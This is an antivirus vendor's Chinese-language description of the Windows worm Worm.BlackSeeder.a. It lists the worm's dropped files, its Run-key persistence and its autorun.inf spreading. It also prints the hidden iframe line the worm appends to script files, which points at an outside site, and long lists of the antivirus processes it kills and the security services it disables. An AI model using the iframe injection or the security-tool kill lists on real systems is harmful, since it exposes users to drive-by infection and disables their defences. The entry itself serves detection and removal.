Worm.BlackSeeder.a

病毒名稱(中文): 病毒別名: 威脅級別: ★☆☆☆☆ 病毒類型: 蠕蟲病毒 病毒長度: 708096 影響系統: Win9xWinMeWinNTWin2000WinXPWin2003 病毒行爲: 這是一個感染型病毒。會感染可執行文件和腳本文件。 1、生成的文件 %DOCUME~1%\ADMINI~1\LOCALS~1\Temp\BLACKSEEDER1.1 %SystemRoot%\DownloadedProgramFiles\0005486A.exe %SystemRoot%\DownloadedProgramFiles\0005486A.DAT 2、添加啓動項 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MSLOGON"="C:\WINNT\DownloadedProgramFiles\0005486A.exe" 3、在個盤下生成autorun.inf啓動，並設置文件屬性爲隱藏。 %X:%\0005486A.exe %X:%\autorun.inf 4、感染腳本，在腳本末添加 %iframesrc=http://www.wangzheqiaodan.com/girl/picture.***width=0height=0%%/iframe% 5、感染可執行文件，修改原文件入口，在原文件加名爲BSDR1.1的節。 6、不斷的讀軟區，發現沒軟盤會不斷的彈沒軟盤的錯誤提示。 7、結束下列進程 mcshield.exe vstskmgr.exe naprdmgr.exe aterui.exe tbmon.exe scan32.exe ravmond.exe ccenter.exe ravtask.exe rav.exe ravmon.exe ravmond.exe ravstub.exe kvxp.kxp kvmonxp.kxp kvcenter.kxp kvsrvxp.exe kregex.exe uihost.exe trojdie.kxp frogagent.exe 360Safe.exe AST.exe 8、修改下列服務，禁止啓動運行 kavsvc AVP AVPkavsvc McAfeeFramework McShield McTaskManager McAfeeFrameworkMcShield McTaskManager navapsvc KVWSC KVSrvXP Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMon wscsvc KPfwSvc SNDSrvc ccProxy ccEvtMgr ccSetMgr SPBBCSvc Symantec CoreLC NPFMntor MskService FireSvc Alerter